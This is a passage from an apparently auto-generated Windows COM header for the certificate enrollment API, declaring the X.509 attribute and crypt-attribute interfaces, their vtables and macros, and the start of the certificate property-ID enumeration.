        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OSVersion )( 
            __RPC__in IX509AttributeOSVersion * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509AttributeOSVersionVtbl;

    interface IX509AttributeOSVersion
    {
        CONST_VTBL struct IX509AttributeOSVersionVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeOSVersion_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeOSVersion_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeOSVersion_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeOSVersion_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeOSVersion_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeOSVersion_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeOSVersion_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeOSVersion_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeOSVersion_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeOSVersion_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeOSVersion_InitializeEncode(This,strOSVersion)	\
    ( (This)->lpVtbl -> InitializeEncode(This,strOSVersion) ) 

#define IX509AttributeOSVersion_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeOSVersion_get_OSVersion(This,pValue)	\
    ( (This)->lpVtbl -> get_OSVersion(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeOSVersion_INTERFACE_DEFINED__ */


#ifndef __IX509AttributeCspProvider_INTERFACE_DEFINED__
#define __IX509AttributeCspProvider_INTERFACE_DEFINED__

/* interface IX509AttributeCspProvider */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeCspProvider;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab32b-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeCspProvider : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ X509KeySpec KeySpec,
            /* [in] */ __RPC__in BSTR strProviderName,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strSignature) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_KeySpec( 
            /* [retval][out] */ __RPC__out X509KeySpec *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ProviderName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Signature( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509AttributeCspProviderVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeCspProvider * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeCspProvider * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeCspProvider * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [in] */ __RPC__in BSTR strProviderName,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strSignature);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeySpec )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [retval][out] */ __RPC__out X509KeySpec *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProviderName )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509AttributeCspProvider * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509AttributeCspProviderVtbl;

    interface IX509AttributeCspProvider
    {
        CONST_VTBL struct IX509AttributeCspProviderVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeCspProvider_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeCspProvider_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeCspProvider_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeCspProvider_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeCspProvider_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeCspProvider_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeCspProvider_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeCspProvider_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeCspProvider_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeCspProvider_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeCspProvider_InitializeEncode(This,KeySpec,strProviderName,Encoding,strSignature)	\
    ( (This)->lpVtbl -> InitializeEncode(This,KeySpec,strProviderName,Encoding,strSignature) ) 

#define IX509AttributeCspProvider_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeCspProvider_get_KeySpec(This,pValue)	\
    ( (This)->lpVtbl -> get_KeySpec(This,pValue) ) 

#define IX509AttributeCspProvider_get_ProviderName(This,pValue)	\
    ( (This)->lpVtbl -> get_ProviderName(This,pValue) ) 

#define IX509AttributeCspProvider_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeCspProvider_INTERFACE_DEFINED__ */


#ifndef __ICryptAttribute_INTERFACE_DEFINED__
#define __ICryptAttribute_INTERFACE_DEFINED__

/* interface ICryptAttribute */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICryptAttribute;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab32c-217d-11da-b2a4-000e7bbb2b09")
    ICryptAttribute : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromObjectId( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromValues( 
            /* [in] */ __RPC__in_opt IX509Attributes *pAttributes) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Values( 
            /* [retval][out] */ __RPC__deref_out_opt IX509Attributes **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICryptAttributeVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICryptAttribute * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICryptAttribute * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICryptAttribute * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICryptAttribute * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICryptAttribute * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICryptAttribute * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICryptAttribute * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromObjectId )( 
            __RPC__in ICryptAttribute * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromValues )( 
            __RPC__in ICryptAttribute * This,
            /* [in] */ __RPC__in_opt IX509Attributes *pAttributes);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in ICryptAttribute * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Values )( 
            __RPC__in ICryptAttribute * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Attributes **ppValue);
        
        END_INTERFACE
    } ICryptAttributeVtbl;

    interface ICryptAttribute
    {
        CONST_VTBL struct ICryptAttributeVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICryptAttribute_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICryptAttribute_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICryptAttribute_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICryptAttribute_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICryptAttribute_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICryptAttribute_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICryptAttribute_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICryptAttribute_InitializeFromObjectId(This,pObjectId)	\
    ( (This)->lpVtbl -> InitializeFromObjectId(This,pObjectId) ) 

#define ICryptAttribute_InitializeFromValues(This,pAttributes)	\
    ( (This)->lpVtbl -> InitializeFromValues(This,pAttributes) ) 

#define ICryptAttribute_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define ICryptAttribute_get_Values(This,ppValue)	\
    ( (This)->lpVtbl -> get_Values(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICryptAttribute_INTERFACE_DEFINED__ */


#ifndef __ICryptAttributes_INTERFACE_DEFINED__
#define __ICryptAttributes_INTERFACE_DEFINED__

/* interface ICryptAttributes */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICryptAttributes;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab32d-217d-11da-b2a4-000e7bbb2b09")
    ICryptAttributes : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttribute **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICryptAttribute *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IndexByObjectId( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [retval][out] */ __RPC__out LONG *pIndex) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddRange( 
            /* [in] */ __RPC__in_opt ICryptAttributes *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICryptAttributesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICryptAttributes * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICryptAttributes * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICryptAttributes * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICryptAttributes * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttribute **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICryptAttributes * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICryptAttributes * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ __RPC__in_opt ICryptAttribute *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICryptAttributes * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IndexByObjectId )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [retval][out] */ __RPC__out LONG *pIndex);
        
        HRESULT ( STDMETHODCALLTYPE *AddRange )( 
            __RPC__in ICryptAttributes * This,
            /* [in] */ __RPC__in_opt ICryptAttributes *pValue);
        
        END_INTERFACE
    } ICryptAttributesVtbl;

    interface ICryptAttributes
    {
        CONST_VTBL struct ICryptAttributesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICryptAttributes_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICryptAttributes_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICryptAttributes_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICryptAttributes_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICryptAttributes_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICryptAttributes_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICryptAttributes_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICryptAttributes_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICryptAttributes_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICryptAttributes_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICryptAttributes_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICryptAttributes_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICryptAttributes_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ICryptAttributes_get_IndexByObjectId(This,pObjectId,pIndex)	\
    ( (This)->lpVtbl -> get_IndexByObjectId(This,pObjectId,pIndex) ) 

#define ICryptAttributes_AddRange(This,pValue)	\
    ( (This)->lpVtbl -> AddRange(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICryptAttributes_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0048 */
/* [local] */ 

typedef 
enum CERTENROLL_PROPERTYID
    {
        XCN_PROPERTYID_NONE	= 0,
        XCN_CERT_KEY_PROV_HANDLE_PROP_ID	= 1,
        XCN_CERT_KEY_PROV_INFO_PROP_ID	= 2,
        XCN_CERT_SHA1_HASH_PROP_ID	= 3,
        XCN_CERT_MD5_HASH_PROP_ID	= 4,
        XCN_CERT_HASH_PROP_ID	= 3,
        XCN_CERT_KEY_CONTEXT_PROP_ID	= 5,
        XCN_CERT_KEY_SPEC_PROP_ID	= 6,
        XCN_CERT_IE30_RESERVED_PROP_ID	= 7,
        XCN_CERT_PUBKEY_HASH_RESERVED_PROP_ID	= 8,
        XCN_CERT_ENHKEY_USAGE_PROP_ID	= 9,
        XCN_CERT_CTL_USAGE_PROP_ID	= 9,
        XCN_CERT_NEXT_UPDATE_LOCATION_PROP_ID	= 10,
        XCN_CERT_FRIENDLY_NAME_PROP_ID	= 11,
        XCN_CERT_PVK_FILE_PROP_ID	= 12,
        XCN_CERT_DESCRIPTION_PROP_ID	= 13,
        XCN_CERT_ACCESS_STATE_PROP_ID	= 14,
        XCN_CERT_SIGNATURE_HASH_PROP_ID	= 15,
        XCN_CERT_SMART_CARD_DATA_PROP_ID	= 16,
        XCN_CERT_EFS_PROP_ID	= 17,
        XCN_CERT_FORTEZZA_DATA_PROP_ID	= 18,
        XCN_CERT_ARCHIVED_PROP_ID	= 19,
        XCN_CERT_KEY_IDENTIFIER_PROP_ID	= 20,
        XCN_CERT_AUTO_ENROLL_PROP_ID	= 21,
        XCN_CERT_PUBKEY_ALG_PARA_PROP_ID	= 22,
        XCN_CERT_CROSS_CERT_DIST_POINTS_PROP_ID	= 23,
        XCN_CERT_ISSUER_PUBLIC_KEY_MD5_HASH_PROP_ID	= 24,
        XCN_CERT_SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID	= 25,
        XCN_CERT_ENROLLMENT_PROP_ID	= 26,
        XCN_CERT_DATE_STAMP_PROP_ID	= 27,
        XCN_CERT_ISSUER_SERIAL_NUMBER_MD5_HASH_PROP_ID	= 28,
        XCN_CERT_SUBJECT_NAME_MD5_HASH_PROP_ID	= 29,
        XCN_CERT_EXTENDED_ERROR_INFO_PROP_ID	= 30,
        XCN_CERT_RENEWAL_PROP_ID	= 64,
        XCN_CERT_ARCHIVED_KEY_HASH_PROP_ID	= 65,
        XCN_CERT_AUTO_ENROLL_RETRY_PROP_ID	= 66,
        XCN_CERT_AIA_URL_RETRIEVED_PROP_ID	= 67,
        XCN_CERT_AUTHORITY_INFO_ACCESS_PROP_ID	= 68,
        XCN_CERT_BACKED_UP_PROP_ID	= 69,
        XCN_CERT_OCSP_RESPONSE_PROP_ID	= 70,
        XCN_CERT_REQUEST_ORIGINATOR_PROP_ID	= 71,
        XCN_CERT_SOURCE_LOCATION_PROP_ID	= 72,
        XCN_CERT_SOURCE_URL_PROP_ID	= 73,
        XCN_CERT_NEW_KEY_PROP_ID	= 74,
        XCN_CERT_OCSP_CACHE_PREFIX_PROP_ID	= 75,
        XCN_CERT_SMART_CARD_ROOT_INFO_PROP_ID	= 76,
        XCN_CERT_NO_AUTO_EXPIRE_CHECK_PROP_ID	= 77,
        XCN_CERT_NCRYPT_KEY_HANDLE_PROP_ID	= 78,
        XCN_CERT_HCRYPTPROV_OR_NCRYPT_KEY_HANDLE_PROP_ID	= 79,
        XCN_CERT_SUBJECT_INFO_ACCESS_PROP_ID	= 80,
        XCN_CERT_CA_OCSP_AUTHORITY_INFO_ACCESS_PROP_ID	= 81,
        XCN_CERT_CA_DISABLE_CRL_PROP_ID	= 82,
        XCN_CERT_ROOT_PROGRAM_CERT_POLICIES_PROP_ID	= 83,
        XCN_CERT_ROOT_PROGRAM_NAME_CONSTRAINTS_PROP_ID	= 84,
        XCN_CERT_SUBJECT_OCSP_AUTHORITY_INFO_ACCESS_PROP_ID	= 85,
        XCN_CERT_SUBJECT_DISABLE_CRL_PROP_ID	= 86,
        XCN_CERT_CEP_PROP_ID	= 87,
        XCN_CERT_SIGN_HASH_CNG_ALG_PROP_ID	= 89,
        XCN_CERT_SCARD_PIN_ID_PROP_ID	= 90,
        XCN_CERT_SCARD_PIN_INFO_PROP_ID	= 91,
        XCN_CERT_SUBJECT_PUB_KEY_BIT_LENGTH_PROP_ID	= 92,
        XCN_CERT_PUB_KEY_CNG_ALG_BIT_LENGTH_PROP_ID	= 93,
        XCN_CERT_ISSUER_PUB_KEY_BIT_LENGTH_PROP_ID	= 94,
        XCN_CERT_ISSUER_CHAIN_SIGN_HASH_CNG_ALG_PROP_ID	= 95,
        XCN_CERT_ISSUER_CHAIN_PUB_KEY_CNG_ALG_BIT_LENGTH_PROP_ID	= 96,
        XCN_CERT_NO_EXPIRE_NOTIFICATION_PROP_ID	= 97,
        XCN_CERT_AUTH_ROOT_SHA256_HASH_PROP_ID	= 98,
        XCN_CERT_NCRYPT_KEY_HANDLE_TRANSFER_PROP_ID	= 99,
        XCN_CERT_HCRYPTPROV_TRANSFER_PROP_ID	= 100,
        XCN_CERT_SMART_CARD_READER_PROP_ID	= 101,
        XCN_CERT_SEND_AS_TRUSTED_ISSUER_PROP_ID	= 102,
        XCN_CERT_KEY_REPAIR_ATTEMPTED_PROP_ID	= 103,
        XCN_CERT_DISALLOWED_FILETIME_PROP_ID	= 104,
        XCN_CERT_ROOT_PROGRAM_CHAIN_POLICIES_PROP_ID	= 105,
        XCN_CERT_SMART_CARD_READER_NON_REMOVABLE_PROP_ID	= 106,
        XCN_CERT_SHA256_HASH_PROP_ID	= 107,
        XCN_CERT_SCEP_SERVER_CERTS_PROP_ID	= 108,
        XCN_CERT_SCEP_RA_SIGNATURE_CERT_PROP_ID	= 109,
        XCN_CERT_SCEP_RA_ENCRYPTION_CERT_PROP_ID	= 110,
        XCN_CERT_SCEP_CA_CERT_PROP_ID	= 111,
        XCN_CERT_SCEP_SIGNER_CERT_PROP_ID	= 112,
        XCN_CERT_SCEP_NONCE_PROP_ID	= 113,
